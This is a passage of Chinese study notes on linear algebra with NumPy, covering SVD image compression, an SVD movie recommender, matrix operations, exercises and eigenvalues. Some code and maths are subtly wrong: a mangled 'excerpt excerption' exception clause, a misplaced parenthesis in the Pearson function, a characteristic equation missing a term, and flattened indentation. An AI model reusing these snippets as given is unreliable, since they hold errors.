    U, s, VT = np.linalg.svd(data)
    Sigma = np.zeros(np.shape(data))
    Sigma[:len(s), :len(s)] = np.diag(s)
    count = (int)(sum(s)) * percent # 取整体奇异值的百分比
    k = -1 # k 是奇异值总和的百分比的个数
    curSum = 0 # 初始为第一个奇异值
    while curSum <= count: # 当取的奇异值之和 <= 应取得奇异值之和 时:
    k += 1
    curSum += s[k]
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :])) # 取 U 的前 k 列, Sigma 的前 k 阶方阵, VT 的前 k 行
    D[D < 0] = 0 # 钳制颜色范围
    D[D > 255] = 255
    # numpy.rint()将数组的元素四舍五入为最接近的整数
    return np.rint(D).astype("uint8")


    def get_approx_SVD2(data, percent):
    """
    SVD 并还原压缩后的数据, 取奇异值之和的百分比
    :param data: 原始矩阵
    :param percent: 奇异值个数百分比
    """
    U, s, VT = np.linalg.svd(data)
    Sigma = np.zeros(np.shape(data))
    Sigma[:len(s), :len(s)] = np.diag(s)
    k = (int)(percent * len(s)) # 取最大的前 k 个奇异值
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :]))
    D[D < 0] = 0
    D[D > 255] = 255
    return np.rint(D).astype("uint8")


    def rebuild_img(filename, p, get_approx_SVD, index):
    """
    导入图像, 进行 SVD 压缩, 并重构图像
    :param filename: 文件名
    :param p: 百分比
    :param get_approx_SVD: 调用的 SVD 筛选方法
    :param index: 显示图像的序号
    """
    img = Image.open(filename, 'r')
    a = np.array(img)
    R0 = a[:, :, 0] # 红色
    G0 = a[:, :, 1] # 绿色
    B0 = a[:, :, 2] # 蓝色
    R = get_approx_SVD(R0, p)
    G = get_approx_SVD(G0, p)
    B = get_approx_SVD(B0, p)
    I = np.stack((R, G, B), 2)

    # 加载图像
    plt.subplot(2, 5, index)
    if get_approx_SVD == get_approx_SVD1:
    plt.title("SVD1 " + str((int)(p * 100)) + '%')
    else:
    plt.title("SVD2 " + str((int)(p * 100)) + '%')
    plt.imshow(I)
    plt.axis('off')


    if __name__ == "__main__":
    filename = "lenna.bmp"
    plt.figure(figsize=(10, 5))
    index = 0
    for p in np.arange(0.2, 1.2, 0.2):
    index += 1
    rebuild_img(filename, p, get_approx_SVD1, index)
    for p in np.arange(0.2, 1.2, 0.2):
    index += 1
    rebuild_img(filename, p, get_approx_SVD2, index)
    plt.show()

    png

    6.7 综合实例 2——利用 SVD 推荐商品

    准备工作,调入相关的库

    import numpy as np
    from numpy import linalg as la
    import pandas as pd
    import time

    1 加载测试数据集,形成 loadExData()函数

    def loadExData():
    """
    行: 代表用户
    列: 代表电影
    值: 代表用户对电影的评分, 0 表示未评分
    :return: 将 csv 转换成的 np.array 数组
    """
    """
    pd.read_csv():
    sep:读取 csv 文件时指定的分隔符,默认为逗号。
    header:设置导入 DataFrame 的列名称(第一行),默认为 "infer"
    """
    return np.array(pd.read_csv("评分.csv", sep=",", header=None))

    2 计算相似度, 形成 ecludSim()欧式距离, pearsSim()皮尔逊相关系数, cosSim() 余弦相似度 三个判断相似度的函数

    • 欧氏距离就是两点间距离公式, 值域为 R

    • 皮尔逊相关系数应该就是概率论与数理统计的那个 r?我记得初中的时候利用计算器的这个 bug 爆机, 值域为[-1, 1]

    • 余弦相似度就是判断两个向量的夹角余弦值, 为 0 就说明两个向量垂直, 不相关, 值域为[-1, 1]

    • 欧氏距离: $dist(\mathbf{X} \cdot \mathbf{Y}) = \left | \mathbf{X} - \mathbf{Y} \right | $

    • 皮尔逊相关系数: $r = \frac{( \mathbf{X-\bar{X}} ) \cdot ( \mathbf{Y-\bar{Y}} )}
      {\left | \mathbf{X-\bar{X}} \right | * \left | \mathbf{Y-\bar{Y}} \right |} $

    • 余弦相似度: $cos\theta = \frac{\mathbf{X} \cdot \mathbf{Y}}{\left | \mathbf{X} \right | * \left | \mathbf{Y} \right |}$

    • 最大最小归一化: $x’ = \frac{x - min(x)}{max(x) - min(x)}$

    """
    以下三种计算方式的参数 X 和 Y 都采用一维数组(向量), 返回的值越接近 1, 相关度越强
    """


    def ecludSim(X, Y):
    """
    利用欧氏距离计算相似度, 并归一化
    """
    return 1.0 / (1.0 + la.norm(X - Y))


    def pearsSim(X, Y):
    """
    利用皮尔逊相关系数计算相似度, 并归一化
    """
    if len(X < 3):
    return 1.0
    else:
    return 0.5 + 0.5 * np.corrcoef(X, Y, rowvar=1)[0][1]


    def cosSim(X, Y):
    """
    利用余弦相似度计算相似度, 并归一化
    """
    return 0.5 + 0.5 * (float(X.dot(Y)) / (la.norm(X) * la.norm(Y)))

    3 对矩阵降维处理, 形成 svd_item()函数

    1. 计算选取的奇异值数目 k 值, 形成 SigmaPct()函数
    def SigmaPct(sigma, percentage):
    """
    按照前 k 个奇异值的平方和占总奇异值的平方和的百分比 percentage 确定 k 的值
    后续计算 SVD 时需要将 item 原始矩阵降维
    """
    sum_sigma = sum(sigma ** 2)
    sum_sigma1 = sum_sigma * percentage # 求所有奇异值 sigma 的平方和的百分比
    sum_sigma2 = 0
    k = 0
    for i in sigma:
    sum_sigma2 += i * i
    k += 1
    if sum_sigma2 >= sum_sigma1:
    return k
    2. 降维处理, 形成 svd_item()函数
    def svd_item(data, percentage):
    """
    降维处理
    :return: 降维的物品数据
    """
    n = np.shape(data)[1] # 物品种类数据
    U, s, VT = la.svd(data) # 数据集进行奇异值分解,返回的 s 为对角线上的值
    k = SigmaPct(s, percentage) # 确定了 k 的值,前 k 个已经包含了 percentage 的能力
    Sigma = np.eye(k) * s[:k] # 构建对角矩阵
    # 将数据转换到 k 维空间(低维),构建转换后的物品
    return data.T.dot(U[:, :k].dot(la.inv(Sigma))) # 返回降维的物品数据

    4 在已经降维的数据中, 对用户未打分的一个物品进行评分预测, 形成 svd_predict()函数

    $$ P _ {uj} = \frac {\Sigma _ {i \in item1} W _ {ji} r _ {ui}}{\Sigma _ {i \in item1}W _ {ji}} $$

    • 其中, $P _ {ui}$表示用户$u$对物品$j$的预测值, $item1$代表用户已打分的物品集合, $W _ {ji}$表示物品$j$和物品$i$的相似度, $r _ {ui}$表示用户$u$对物品$i$的打分
    • 该公式的含义: 与用户历史上感兴趣(评分高)的物品(向量)越相似(根据相似度判定算法得出)的物品(向量), 越有可能在用户的推荐列表中获得较高排名.
    def svd_predict(data, user, simMeas, FormedItems, item):
    """
    基于 item 的相似性对用户未评过分的物品进行预测评分
    :param data: 数组矩阵
    :param user: 用户编号
    :param simMeas: 相似度算法
    :param FormedItems: 数组矩阵的行对应用户
    :param item: 列对应物品
    :return: 对物品的预测评分,返回后用于分数的排序
    """
    n = np.shape(data)[1] # 得到数据集中的物品种类数据(各个列)
    Totalsim = 0.0 # 初始化两个评分值
    TotalratSim = 0.0 # 相似性总和变量初始化
    # 遍历给定的用户行中的每个物品
    # 即(对用户评过分的物品进行遍历,并将它与其他物品进行比较),计算相似度
    for j in range(n):
    # 得到给定的用户 user 对商品的评分
    Rating_user = data[user, j]
    # 只对 评价过的商品 和 不是自己的商品 求相似度
    if Rating_user != 0 and j != item:
    # 计算 svd 转换过后矩阵的相似度,物品 item 与物品 j 之间的相似度
    # 相似度的计算方法也会作为一个参数传递给该函数
    Similarity = simMeas(FormedItems[item, :], FormedItems[j, :])
    Totalsim += Similarity # 对相似度不断累加求和
    TotalratSim += Similarity * Rating_user # 对相似度及对应评分值乘积求和
    if Totalsim == 0:
    return 0
    else:
    return TotalratSim / Totalsim # 得到对物品的预测评分,返回后用于分数的排序

    5 产生前 N 个评分值高的物品,返回物品编号以及预测评分值,形成 recommend()函数

    def recommend(data, user, FormedItems, N, simMeas):
    # 为未评价的物品建立一个用户未评分 item 的列表
    unratedItems = np.array(np.nonzero(data[user, :] == 0))[0]
    if len(unratedItems) == 0:
    return "你已评价完所有物品" # 若都已经评过分,则退出
    Scoresitem = []
    for item in unratedItems: # 对未评分的物品 item,都计算其预测评分
    # 计算评价值
    estimatedScore = svd_predict(data, user, simMeas, FormedItems,
    item)
    Scoresitem.append((item, estimatedScore)) # 记录商品及评价值
    Scoresitem = sorted(Scoresitem, key=lambda x: x[1], reverse=True) # 按照得分逆序排序
    return Scoresitem[:N] # 返回前 N 个评分的物品名

    6 对指定用户进行商品推荐,形成 recommend_predict 函数。

    def recommend_predict():
    user_item = loadExData() # 读取数据
    percentage = 0.9 # 奇异值平方和的百分比
    user = 1 # 预测的用户
    n = 4 # 推荐个数
    FormedItems = svd_item(user_item, percentage) # 获得 SVD 降维后的物品

    s_t = time.time()
    simMeas = cosSim # 相似度
    r1 = recommend(user_item, user, FormedItems, n, simMeas)
    print('利用余弦相似度计算距离,进行的奇异值分解推荐:')
    print("按相似度推荐的物品编号为:", r1, "\n 用时:", time.time() - s_t)

    s_t = time.time()
    simMeas = ecludSim
    r2 = recommend(user_item, user, FormedItems, n, simMeas)
    print('利用欧氏距离计算距离,进行的奇异值分解推荐:')
    print("按相似度推荐的物品编号为:", r2, "\n 用时:", time.time() - s_t)

    s_t = time.time()
    simMeas = pearsSim
    r3 = recommend(user_item, user, FormedItems, n, simMeas)
    print('利用皮尔逊相关系数计算距离,进行的奇异值分解推荐:')
    print("按相似度推荐的物品编号为:", r3, "\n 用时:", time.time() - s_t)
    7 调用 recommend_predict()函数,获得结果。
    if __name__ == "__main__":
    recommend_predict()
    利用余弦相似度计算距离,进行的奇异值分解推荐:按相似度推荐的物品编号为:[(1605, 3.7280993014041743), (935, 3.72778748418618), (366, 3.7274892395964807), (812, 3.7260645630753846)] 用时: 1.6344106197357178利用欧氏距离计算距离,进行的奇异值分解推荐:按相似度推荐的物品编号为:[(8, 3.690142726938304), (514, 3.689943318086311), (14, 3.6894721117751406), (172, 3.689287056157151)] 用时: 1.240149736404419利用皮尔逊相关系数计算距离,进行的奇异值分解推荐:按相似度推荐的物品编号为:[(1, 3.7096774193548385), (2, 3.7096774193548385), (3, 3.7096774193548385), (4, 3.7096774193548385)] 用时: 0.8249673843383789

    6.8.2 用户——电影评分矩阵的获取

    import numpy as np
    import pandas as pd

    # 1、读入数据集 header = [用户 id, 电影 id, 评分(取整), 用户提交时间所用秒数]
    header = ["user_id","item_id","rating","timestamp"]
    data = pd.read_csv("u.data", sep="\t", names=header) # 以 csv 文件格式读取 u.data, 分隔符是\t, 列名是 header
    # 2、生成用户—物品评分矩阵
    # 检查是否有重复的用户物品打分记录(数据清洗)
    # data.duplicated() # 返回布尔型数据,告诉重复值的位置
    data.duplicated(subset = ["user_id","item_id"]).sum() # 返回重复值的个数
    item_id_user = data.groupby("item_id").count()["user_id"] # 返回表格(物品 id, 评分用户次数)
    print(item_id_user)
    # 构建用户物品矩阵
    users_num = data.user_id.max() # 选择最大的 id, 可以剔除重复数据
    items_num = data.item_id.max()
    user_item_rating = np.zeros((users_num,items_num))
    for line in data.itertuples(): # itertuples():将 DataFrame 迭代成元组
    # 以元组的方式赋值
    user_item_rating[line[1] - 1, line[2] - 1] = line[3]
    # 生成用户——电影评分矩阵存储成文本文件, 数据为 user_item_rating, 分隔符为,
    np.savetxt("评分 2.csv", user_item_rating, delimiter = ",")
    # 输出 u.data 中的前 5 行内容
    data.head()
    item_id1       4522       1313        904       2095        86       ... 1678      11679      11680      11681      11682      1Name: user_id, Length: 1682, dtype: int64
    user_id item_id rating timestamp
    0 196 242 3 881250949
    1 186 302 3 891717742
    2 22 377 1 878887116
    3 244 51 2 880606923
    4 166 346 1 886397596
    # 输出 u.data 中的大小
    print("数据集的大小", data.shape)
    # 输出客户数和电影数
    print("客户数 =", users_num)
    print("电影数 =", items_num)
    print("客户数 * 电影数:", users_num * items_num)
    # 查看生成的 user_item_rating 非零元素
    print("user_item_rating 中的非零元素个数", len(user_item_rating.nonzero()[1]))
    print("user_item_rating 中的非零元素", user_item_rating.nonzero()[1])
    # 查看生成的 user_item_rating 矩阵的稀疏性
    sparsity = round(len(user_item_rating.nonzero()[1]) / float(users_num * items_num), 3)
    print("user_item_rating 矩阵的稀疏性:", sparsity)
    print("user_item_rating 矩阵的大小", user_item_rating.shape)
    # 以表格形式显示用户—电影评分表矩阵, 列名为电影, 行名为用户
    pd.DataFrame(user_item_rating)
    数据集的大小 (100000, 4)客户数 = 943电影数 = 1682客户数 * 电影数: 1586126user_item_rating 中的非零元素个数 100000user_item_rating 中的非零元素 [   0    1    2 ... 1187 1227 1329]user_item_rating 矩阵的稀疏性:0.063user_item_rating 矩阵的大小 (943, 1682)
    0 1 2 3 4 5 6 7 8 9 ... 1672 1673 1674 1675 1676 1677 1678 1679 1680 1681
    0 5.0 3.0 4.0 3.0 3.0 5.0 4.0 1.0 5.0 3.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    1 4.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 2.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    3 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    4 4.0 3.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...
    938 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 5.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    939 0.0 0.0 0.0 2.0 0.0 0.0 4.0 5.0 3.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    940 5.0 0.0 0.0 0.0 0.0 0.0 4.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    941 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
    942 0.0 5.0 0.0 0.0 0.0 0.0 0.0 0.0 3.0 0.0 ... 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0

    943 rows × 1682 columns

    ]]>
    + 正文:2 核心篇

    5 将研究对象形式化——线性代数基础

    5.3.3 矩阵的创建

    直接生成

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import numpy as np

    A = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]
    arr1 = np.array(A)
    print("A=", A)
    print("arr1=\n", arr1)
    B = ((1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12))
    arr2 = np.array(B)
    print("B=", B)
    print("arr2=\n", arr2)

    print("type(A)=", type(A))
    print("type(B)=", type(B))
    print("type(arr1)=", type(arr1))
    print("arr1.shape=", arr1.shape)
    A= [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]arr1= [[ 1  2  3  4] [ 5  6  7  8] [ 9 10 11 12]]B= ((1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12))arr2= [[ 1  2  3  4] [ 5  6  7  8] [ 9 10 11 12]]type(A)= <class 'list'>type(B)= <class 'tuple'>type(arr1)= <class 'numpy.ndarray'>arr1.shape= (3, 4)

    间接创建

    1
    2
    3
    4
    5
    6
    import numpy as np

    arr1 = np.random.random((2, 3))
    print("arr1=\n", arr1)
    arr2 = np.random.randint(3, 30, size=[2, 3]) # 3-30(不包括 30)
    print("arr2=\n", arr2)
    arr1= [[0.7888749  0.29995777 0.79464025] [0.48565204 0.77377983 0.84873221]]arr2= [[19 17  7] [ 4 25 14]]

    改变矩阵的大小

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import numpy as np

    A = [1, 2, 3, 4, 5, 6]
    B = np.array(A)
    C1 = B.reshape(2, 3)
    C2 = B.reshape(3, 2)
    print("B=", B)
    print("C1=\n", C1)
    print("C2=\n", C2)
    B= [1 2 3 4 5 6]C1= [[1 2 3] [4 5 6]]C2= [[1 2] [3 4] [5 6]]

    矩阵元素的存取

    1
    C1[0]  # 第 0 行
    array([1, 2, 3])
    1
    C1[0:2]  #  0-2(不含 2)行
    array([[1, 2, 3],       [4, 5, 6]])
    1
    C2[[0, 2]]  # 第 0 行和第 2 行
    array([[1, 2],       [5, 6]])
    1
    C2[:, 1]  # 第 1 列
    array([2, 4, 6])
    1
    C2[:, 0:2]  # 0-2(不含 2)列
    array([[1, 2],       [3, 4],       [5, 6]])
    1
    C1[:, [0, 2]]  # 第 0 列和第 2 列
    array([[1, 3],       [4, 6]])
    1
    C2[2, 1]  # 第 2 行第 1 列
    6
    1
    C2[2][1]  # 第 2 行第 1 列
    6

    5.3.4 向量的创建

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import numpy as np

    A = [[1, 2, 3, 4, 5]]
    B = [[1], [2], [3], [4], [5]]
    C = np.array(A)
    D = np.array(B)
    print("C=\n", C)
    print("D=\n", D)
    print("C.shape", np.shape(C))
    print("D.shape", np.shape(D))
    C= [[1 2 3 4 5]]D= [[1] [2] [3] [4] [5]]C.shape (1, 5)D.shape (5, 1)

    5.4 特殊的矩阵

    零矩阵

    1
    np.zeros(10)
    array([0., 0., 0., 0., 0., 0., 0., 0., 0., 0.])
    1
    np.zeros((2, 4))
    array([[0., 0., 0., 0.],       [0., 0., 0., 0.]])
    1
    np.array([np.zeros(10)])
    array([[0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]])

    单位矩阵

    1
    np.eye(3)
    array([[1., 0., 0.],       [0., 1., 0.],       [0., 0., 1.]])
    1
    np.identity(3)
    array([[1., 0., 0.],       [0., 1., 0.],       [0., 0., 1.]])

    对角矩阵

    1
    2
    arr1 = np.diag([1, 2, 3])
    arr1
    array([[1, 0, 0],       [0, 2, 0],       [0, 0, 3]])
    1
    np.diag(arr1)
    array([1, 2, 3])

    上三角矩阵

    1
    2
    A = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]])
    np.triu(A, 0)
    array([[ 1,  2,  3,  4],       [ 0,  6,  7,  8],       [ 0,  0, 11, 12],       [ 0,  0,  0, 16]])
    1
    np.tril(A, 0)
    array([[ 1,  0,  0,  0],       [ 5,  6,  0,  0],       [ 9, 10, 11,  0],       [13, 14, 15, 16]])

    判断矩阵是否相等

    1
    2
    3
    A = np.array([[1, 2, 3], [4, 5, 6]])
    B = np.array([1, 2, 3, 4, 5, 6]).reshape(2, 3)
    np.allclose(A, B)
    True

    5.5 矩阵基本操作

    5.5.3 矩阵乘法

    1
    2
    3
    A = np.array([[1, 2], [1, 0]])
    B = np.diag([2, 2])
    A.dot(B) # 矩阵乘法 AB
    array([[2, 4],       [2, 0]])
    1
    A * B  # np.array 类型, * 表示对应元素相乘
    array([[2, 0],       [0, 0]])
    1
    np.multiply(A, B)
    array([[2, 0],       [0, 0]])
    1
    2
    3
    A = np.mat([[1, 2], [1, 0]])
    B = np.mat(np.diag([2, 2]))
    A * B # np.mat 类型, * 表示矩阵乘法
    matrix([[2, 4],        [2, 0]])

    5.5.5 矩阵的乘方

    只有方阵才可进行乘方运算.对 array 类型, 矩阵的乘方要经多次 dot 运算得到, 对 matrix 类型, 可以通过 ** 得到, array 类型的 ** 是每个元素的 n 次方

    1
    2
    3
    4
    A = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
    A_array = np.array(A)
    A_matrix = np.mat(A)
    A_array.dot(A_array).dot(A_array)
    array([[ 468,  576,  684],       [1062, 1305, 1548],       [1656, 2034, 2412]])
    1
    A_array ** 3
    array([[  1,   8,  27],       [ 64, 125, 216],       [343, 512, 729]], dtype=int32)
    1
    A_matrix ** 3
    matrix([[ 468,  576,  684],        [1062, 1305, 1548],        [1656, 2034, 2412]])

    5.6.1 转置矩阵

    利用转置矩阵创建对称矩阵

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import numpy as np

    arr1 = np.random.randint(1, 16, size=[3, 3])
    arr2 = np.triu(arr1)
    arr2 += arr2.T - np.diag(np.diag(arr2))

    print("arr1=\n", arr1)
    print("arr2=\n", arr2)
    print(np.allclose(arr2, arr2.T))
    arr1= [[ 8 14 15] [13 13 12] [ 3  8 12]]arr2= [[ 8 14 15] [14 13 12] [15 12 12]]True

    5.6.2 逆矩阵

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import numpy as np

    A = [[1, 2], [2, 5]]
    C1 = np.array(A)
    C2 = np.mat(A)
    C1_inverse = np.linalg.inv(C1) # array 类型不能使用 C1.I
    C2_inverse = C2.I
    print("C1_inverse=\n", C1_inverse)
    print("C2_inverse=\n", C2_inverse)
    print("C1.dot(C1_inverse)=\n", C1.dot(C1_inverse))
    C1_inverse= [[ 5. -2.] [-2.  1.]]C2_inverse= [[ 5. -2.] [-2.  1.]]C1.dot(C1_inverse)= [[1. 0.] [0. 1.]]
    1
    C2 ** (-1)
    matrix([[ 5., -2.],        [-2.,  1.]])

    “导致降维”, 行列式为 0 的矩阵不可逆

    1
    2
    3
    4
    try:
    np.mat([[0, 0], [0, 1]]) ** (-1)
    excerpt excerption as e:
    print(e)
    Singular matrix

    5.7.4 行列式的计算

    1
    np.linalg.det(np.diag([1, 2, 3, 4]))  # np.linalg 线性代数
    23.999999999999993

    5.8.4 矩阵的秩

    1
    np.linalg.matrix_rank(np.diag([1, 2, 3]))
    3
    1
    np.linalg.matrix_rank(np.diag([1, 2, 0]))
    2

    5.9.1 向量的内积

    1
    2
    3
    4
    5
    A = [[1, 2, 3]]
    B = [[4, 5, 6]]
    C1 = np.array(A).reshape(3, 1) # 转换成列向量
    C2 = np.array(B).reshape(3, 1)
    np.dot(C1.T, C2)
    array([[32]])

    5.9.2 向量的长度

    1
    2
    A = np.array([[0, 3, 4]])
    np.linalg.norm(A)
    5.0

    5.9.4 标准正交基

    定义 5.17 在复数范围内满足$ATA=AAT=E$, 则称$A$为酉矩阵
    酉矩阵常用于奇异值分解(SVD)中, 正交矩阵是实数特殊化的酉矩阵

    综合实例——线性代数在实际问题中的应用

    解方程组:

    $$
    \left{\begin{matrix}
    x + 2y + z = 7
    \ 2x - y + 3z = 7
    \ 3x + y + 2z =18
    \end{matrix}\right.
    $$

    1
    2
    3
    4
    5
    6
    import numpy as np

    A = np.mat([[1, 2, 1], [2, -1, 3], [3, 1, 2]])
    B = np.mat([7, 7, 18]).reshape(3, 1)
    AB = np.hstack((A, B))
    AB
    matrix([[ 1,  2,  1,  7],        [ 2, -1,  3,  7],        [ 3,  1,  2, 18]])

    1 利用逆矩阵求$AX=B$, $X=A^{-1}B$

    1
    2
    X = A.I * B
    X
    matrix([[ 7.],        [ 1.],        [-2.]])
    1
    A * X  # 验证
    matrix([[ 7.],        [ 7.],        [18.]])

    2 利用 np.linalg.solve()

    1
    np.linalg.solve(A, B)
    matrix([[ 7.],        [ 1.],        [-2.]])

    3 利用 Sympy 库的 solve 函数

    1
    2
    3
    4
    5
    6
    7
    import sympy
    from sympy.abc import x, y, z

    eq = [x + 2 * y + z - 7,
    2 * x - y + 3 * z - 7,
    3 * x + y + 2 * z - 18]
    sympy.solve(eq, [x, y, z])
    {x: 7, y: 1, z: -2}

    解具有无穷解的方程组

    $$
    \left{\begin{matrix}
    x + 2y + z - 2w = 0
    \ 2x + 3y - w = 0
    \ x - y - 5z + 7w = 0
    \end{matrix}\right.
    $$

    1
    2
    3
    4
    5
    6
    import numpy as np

    A = np.array([[1, 2, 1, -2],
    [2, 3, 0, -1],
    [1, -1, -5, 7]])
    np.linalg.matrix_rank(A)
    2
    1
    2
    3
    4
    5
    6
    import sympy
    from sympy.abc import x, y, z, w

    eq = [x + 2 * y + z - 2 * w, 2 * x + 3 * y - w, x - y - 5 * z + 7 * w]
    result = sympy.solve(eq, [x, y, z, w])
    result
    {x: -4*w + 3*z, y: 3*w - 2*z}
    1
    2
    3
    4
    A = {z:1, w:2}
    x = float(result[x].evalf(subs=A))
    y = float(result[y].evalf(subs=A))
    x, y
    (-5.0, 4.0)

    例 5.18 获取数据集的数据 读取 csv 文件

    1
    2
    3
    4
    5
    import pandas as pd
    import numpy as np

    dataset = pd.read_csv("iris.csv")
    data = np.array(dataset)

    5.12 习题

    (1)

    分别使用三种方法求线性方程组的解

    $$
    \left { \begin{matrix}
    x+y+z=2
    \x+2y+4z=3
    \x+3y+9z=5
    \end{matrix}\right .
    $$

    1
    1
    2
    3
    4
    5
    6
    7
    8
    import numpy as np

    A = np.mat([[1, 1, 1],
    [1, 2, 4],
    [1, 3, 9]])
    B = np.mat([2, 3, 5]).reshape(3, 1)
    AB = np.hstack((A, B))
    AB
    matrix([[1, 1, 1, 2],        [1, 2, 4, 3],        [1, 3, 9, 5]])
    1
    A.I * B
    matrix([[ 2. ],        [-0.5],        [ 0.5]])
    2
    1
    np.linalg.solve(A, B)
    matrix([[ 2. ],        [-0.5],        [ 0.5]])
    3
    1
    2
    3
    4
    5
    import sympy
    from sympy.abc import x, y, z

    eq = [x + y + z - 2, x + 2 * y + 4 * z - 3, x + 3 * y + 9 * z - 5]
    sympy.solve(eq, [x, y, z])
    {x: 2, y: -1/2, z: 1/2}

    (2)

    分别创建 3 * 4 阶和 4 * 5 阶的矩阵,元素值为 1-20 的随机整数,计算着两个矩阵的乘积,求这两个矩阵的秩

    1
    2
    3
    4
    5
    import numpy as np

    A = np.random.randint(1, 20, size=[3, 4])
    B = np.random.randint(1, 20, size=[4, 5])
    A, B
    (array([[ 2, 18, 16,  6],        [19,  1, 12, 19],        [11,  9, 18, 17]]), array([[ 7, 14, 14, 14,  6],        [11, 10, 11,  8, 10],        [ 4,  3,  8,  4, 11],        [11, 10, 14,  1,  3]]))
    1
    A.dot(B)
    array([[342, 316, 438, 242, 386],       [401, 502, 639, 341, 313],       [435, 468, 635, 315, 405]])
    1
    np.linalg.matrix_rank(A)
    3
    1
    np.linalg.matrix_rank(B)
    4

    (3)

    求下面矩阵的逆矩阵,求逆矩阵时要先求行列式,行列式不为 0 时逆矩阵存在,之后再进行求逆操作

    $$
    A=\begin{bmatrix}
    1 & 2 & 3 \
    2 & 2 & 1 \
    3 & 4 & 3
    \end{bmatrix}
    $$

    1
    2
    3
    4
    5
    6
    import numpy as np

    A = np.mat([[1, 2, 3],
    [2, 2, 1],
    [3, 4, 3]])
    np.linalg.det(A)
    1.9999999999999993
    1
    A.I
    matrix([[ 1. ,  3. , -2. ],        [-1.5, -3. ,  2.5],        [ 1. ,  1. , -1. ]])

    (4)

    分别创建四阶零矩阵和四阶单位矩阵,以及对角线元素分别为 1,2,3,4 的对角矩阵

    1
    np.zeros((4, 4))
    array([[0., 0., 0., 0.],       [0., 0., 0., 0.],       [0., 0., 0., 0.],       [0., 0., 0., 0.]])
    1
    np.identity(4)
    array([[1., 0., 0., 0.],       [0., 1., 0., 0.],       [0., 0., 1., 0.],       [0., 0., 0., 1.]])
    1
    np.diag([1, 2, 3, 4])
    array([[1, 0, 0, 0],       [0, 2, 0, 0],       [0, 0, 3, 0],       [0, 0, 0, 4]])

    (5)

    创建一个四阶方阵,元素值为 1~20 的随机浮点数,根据其上三角和下三角矩阵创建其对应的对称矩阵

    1
    2
    A = np.random.random(16).reshape(4, 4) * 20
    A
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [11.80703601, 11.72735218,  7.43395284, 14.95671889],       [18.40134451, 17.69715348, 14.43624563,  4.31954707],       [11.07252469,  7.31171911, 16.52018505, 11.79353701]])
    1
    np.triu(A)
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [ 0.        , 11.72735218,  7.43395284, 14.95671889],       [ 0.        ,  0.        , 14.43624563,  4.31954707],       [ 0.        ,  0.        ,  0.        , 11.79353701]])
    1
    np.triu(A).T + np.triu(A) - np.diag(np.diag(A))
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [ 3.99280371, 11.72735218,  7.43395284, 14.95671889],       [13.3828697 ,  7.43395284, 14.43624563,  4.31954707],       [13.32337192, 14.95671889,  4.31954707, 11.79353701]])
    1
    np.tril(A).T + np.tril(A) - np.diag(np.diag(A))
    array([[14.08629999, 11.80703601, 18.40134451, 11.07252469],       [11.80703601, 11.72735218, 17.69715348,  7.31171911],       [18.40134451, 17.69715348, 14.43624563, 16.52018505],       [11.07252469,  7.31171911, 16.52018505, 11.79353701]])

    6 从数据中提取重要信息——特征值与矩阵分解

    6.1.4 特征值的实现

    已知
    $$A=
    \begin{bmatrix}
    4 & 2 \
    1 & 5
    \end{bmatrix}
    $$
    求 A 的特征值和特征向量

    $|A-\lambda E|=
    \begin{vmatrix}
    4- \lambda & 2\
    1 & 5 - \lambda
    \end{vmatrix}=0$

    $(4 - \lambda)(5 - \lambda) = 0$

    $\lambda ^ 2 - 9\lambda + 18 = 0$

    特征值: $\lambda _ {1} = 3$, $\lambda _ {2} = 6$

    $A - 3E =
    \begin{bmatrix}
    1 & 2\
    1 & 2
    \end{bmatrix} \to$ 特征向量 $(-2, 1)^T$, 单位化得$(-\frac{2}{5}\sqrt 5,\frac {1}{5}\sqrt 5)^T$

    $A - 6E =
    \begin{bmatrix}
    -2 & 2\
    1 & -1
    \end{bmatrix} \to$ 特征向量 $(1, 1)^T$, 单位正交化得$(-\frac{1}{2}\sqrt 2, -\frac{1}{2}\sqrt 2)^T$

    1
    2
    3
    4
    import numpy as np

    A = np.array([[4, 2], [1, 5]])
    eig_val, eig_vex = np.linalg.eig(A) # eig()函数分别求解特征值和特征向量矩阵
    1
    eig_val  # 特征值
    array([3., 6.])
    1
    eig_vex  # 特征向量矩阵(已标准化)
